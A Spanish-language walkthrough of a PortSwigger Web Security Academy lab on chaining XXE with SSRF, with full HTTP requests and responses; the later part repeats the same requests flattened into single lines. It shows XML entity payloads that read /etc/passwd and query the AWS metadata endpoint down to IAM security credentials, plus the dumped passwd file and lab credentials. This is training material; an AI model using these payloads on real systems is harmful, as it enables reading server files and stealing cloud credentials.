Lab 2: Exploiting XXE to perform SSRF attacks

https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf

Al acceder al aplicativo web, se puede apreciar el siguiente button:

Se genera la siguiente peticion:

POST /product/stock HTTP/2
Host: 0a4a00790442213c820d0136009d00d4.web-security-academy.net
Cookie: session=Y9VSlomfzNJKPRChjqGQQZKE0rvGZRX4
Content-Length: 107
Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
Content-Type: application/xml
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; 
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://0a4a00790442213c820d0136009d00d4.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a4a00790442213c820d0136009d00d4.web-security-academy.net/product?productId=2
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Priority: u=1, i

<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
    <productId>2</productId>
    <storeId>1</storeId>
</stockCheck>

Y su respuesta es:

HTTP/2 200 OK
Content-Type: text/plain; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 2

17

Al detectar la sintaxis de XML, se procede a intentar a realizar inyecciones de XML:

POST /product/stock HTTP/2
Host: 0a4a00790442213c820d0136009d00d4.web-security-academy.net
Cookie: session=Y9VSlomfzNJKPRChjqGQQZKE0rvGZRX4
Content-Length: 176
Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
Content-Type: application/xml
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://0a4a00790442213c820d0136009d00d4.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a4a00790442213c820d0136009d00d4.web-security-academy.net/product?productId=2
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Priority: u=1, i

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

Y se puede apreciar que si es vulnerable:

HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 2338

"Invalid product ID: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
peter:x:12001:12001::/home/peter:/bin/bash
carlos:x:12002:12002::/home/carlos:/bin/bash
user:x:12000:12000::/home/user:/bin/bash
elmer:x:12099:12099::/home/elmer:/bin/bash
academy:x:10000:10000::/academy:/bin/bash
messagebus:x:101:101::/nonexistent:/usr/sbin/nologin
dnsmasq:x:102:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
systemd-timesync:x:103:103:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:104:105:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:105:106:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
mysql:x:106:107:MySQL Server,,,:/nonexistent:/bin/false
postgres:x:107:110:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:109:115:RealtimeKit,,,:/proc:/usr/sbin/nologin
mongodb:x:110:117::/var/lib/mongodb:/usr/sbin/nologin
avahi:x:111:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
cups-pk-helper:x:112:119:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
geoclue:x:113:120::/var/lib/geoclue:/usr/sbin/nologin
saned:x:114:122::/var/lib/saned:/usr/sbin/nologin
colord:x:115:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
pulse:x:116:124:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gdm:x:117:126:Gnome Display Manager:/var/lib/gdm3:/bin/false
"

Teniendo en cuenta que este servicio si es vulnerable a XXE.

Se procede a intentar realizar una concatenacion de vulnerabilidades de XXE con SSRF y el objetivo es poder comunicarse con el servicio de metadatos de AWS:

POST /product/stock HTTP/2
Host: 0a4a00790442213c820d0136009d00d4.web-security-academy.net
Cookie: session=Y9VSlomfzNJKPRChjqGQQZKE0rvGZRX4
Content-Length: 181
Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
Content-Type: application/xml
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://0a4a00790442213c820d0136009d00d4.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a4a00790442213c820d0136009d00d4.web-security-academy.net/product?productId=2
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Priority: u=1, i

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

La respuesta de la peticion previa es:

HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 28

"Invalid product ID: latest"

La respuesta previa se puede apreciar la palabra latest asi que la concatenamos a la URL previa:

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/"> ]>

Y tenemos la siguiente respuesta:

HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 31

"Invalid product ID: meta-data"

Para finalizar, podriamos realizar un consumo asi:

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>

Se puede apreciar la siguiente respuesta:

HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 552

"Invalid product ID: {
  "Code" : "Success",
  "LastUpdated" : "2024-07-02T19:31:09.233605849Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "cjX7LLseE7BHsG6oPwPi",
  "SecretAccessKey" : "eWyW71acB4TQmyUn8v2h0G5i18sHp01H5wgVe5iU",
  "Token" : "bulfZ8mXHrikGu0EDiep2D1BdRykvfNFqC6qTAEb4C0nWEUVmkjT4mk73ulNUYVUHYJdBM9Yddbd2KOgdJbDUUy6WgdRbETZ0RVExQxN1ZLku3ha7rtdTqJT5FMaL3RqpQZaCrMWo69dWXQ3eF3dDLPJDDz7wvHR9B7WooJNsnM1DdDothkqMr94VcjGU4xYC86ufziIyxOMnSpK4m90aQAprtUfkKvN6nSswiX2vCIF2jagHGAbBshNYVuLnAuw",
  "Expiration" : "2030-07-01T19:31:09.233605849Z"
}"

AnteriorLab 1: Exploiting XXE using external entities to retrieve files SiguienteLab 3: Blind XXE with out-of-band interaction

Última actualización hace 4 meses

POST /product/stock HTTP/2 Host: 0a4a00790442213c820d0136009d00d4.web-security-academy.net Cookie: session=Y9VSlomfzNJKPRChjqGQQZKE0rvGZRX4 Content-Length: 107 Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128" Content-Type: application/xml Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Sec-Ch-Ua-Platform: "Windows" Accept: */* Origin: https://0a4a00790442213c820d0136009d00d4.web-security-academy.net Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://0a4a00790442213c820d0136009d00d4.web-security-academy.net/product?productId=2 Accept-Encoding: gzip, deflate, br Accept-Language: es-ES,es;q=0.9 Priority: u=1, i <?xml version="1.0" encoding="UTF-8"?> <stockCheck> <productId>2</productId> <storeId>1</storeId> </stockCheck>

POST /product/stock HTTP/2 Host: 0a4a00790442213c820d0136009d00d4.web-security-academy.net Cookie: session=Y9VSlomfzNJKPRChjqGQQZKE0rvGZRX4 Content-Length: 176 Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128" Content-Type: application/xml Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Accept: */* Origin: https://0a4a00790442213c820d0136009d00d4.web-security-academy.net Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://0a4a00790442213c820d0136009d00d4.web-security-academy.net/product?productId=2 Accept-Encoding: gzip, deflate, br Accept-Language: es-ES,es;q=0.9 Priority: u=1, i <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

HTTP/2 400 Bad Request Content-Type: application/json; charset=utf-8 X-Frame-Options: SAMEORIGIN Content-Length: 2338 "Invalid product ID: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin peter:x:12001:12001::/home/peter:/bin/bash carlos:x:12002:12002::/home/carlos:/bin/bash user:x:12000:12000::/home/user:/bin/bash elmer:x:12099:12099::/home/elmer:/bin/bash academy:x:10000:10000::/academy:/bin/bash messagebus:x:101:101::/nonexistent:/usr/sbin/nologin dnsmasq:x:102:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin systemd-timesync:x:103:103:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:104:105:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:105:106:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin mysql:x:106:107:MySQL Server,,,:/nonexistent:/bin/false postgres:x:107:110:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin rtkit:x:109:115:RealtimeKit,,,:/proc:/usr/sbin/nologin mongodb:x:110:117::/var/lib/mongodb:/usr/sbin/nologin avahi:x:111:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin cups-pk-helper:x:112:119:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin geoclue:x:113:120::/var/lib/geoclue:/usr/sbin/nologin saned:x:114:122::/var/lib/saned:/usr/sbin/nologin colord:x:115:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin pulse:x:116:124:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin gdm:x:117:126:Gnome Display Manager:/var/lib/gdm3:/bin/false "

POST /product/stock HTTP/2 Host: 0a4a00790442213c820d0136009d00d4.web-security-academy.net Cookie: session=Y9VSlomfzNJKPRChjqGQQZKE0rvGZRX4 Content-Length: 181 Sec-Ch-Ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128" Content-Type: application/xml Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Accept: */* Origin: https://0a4a00790442213c820d0136009d00d4.web-security-academy.net Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://0a4a00790442213c820d0136009d00d4.web-security-academy.net/product?productId=2 Accept-Encoding: gzip, deflate, br Accept-Language: es-ES,es;q=0.9 Priority: u=1, i <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]> <stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

HTTP/2 400 Bad Request Content-Type: application/json; charset=utf-8 X-Frame-Options: SAMEORIGIN Content-Length: 552 "Invalid product ID: { "Code" : "Success", "LastUpdated" : "2024-07-02T19:31:09.233605849Z", "Type" : "AWS-HMAC", "AccessKeyId" : "cjX7LLseE7BHsG6oPwPi", "SecretAccessKey" : "eWyW71acB4TQmyUn8v2h0G5i18sHp01H5wgVe5iU", "Token" : "bulfZ8mXHrikGu0EDiep2D1BdRykvfNFqC6qTAEb4C0nWEUVmkjT4mk73ulNUYVUHYJdBM9Yddbd2KOgdJbDUUy6WgdRbETZ0RVExQxN1ZLku3ha7rtdTqJT5FMaL3RqpQZaCrMWo69dWXQ3eF3dDLPJDDz7wvHR9B7WooJNsnM1DdDothkqMr94VcjGU4xYC86ufziIyxOMnSpK4m90aQAprtUfkKvN6nSswiX2vCIF2jagHGAbBshNYVuLnAuw", "Expiration" : "2030-07-01T19:31:09.233605849Z" }"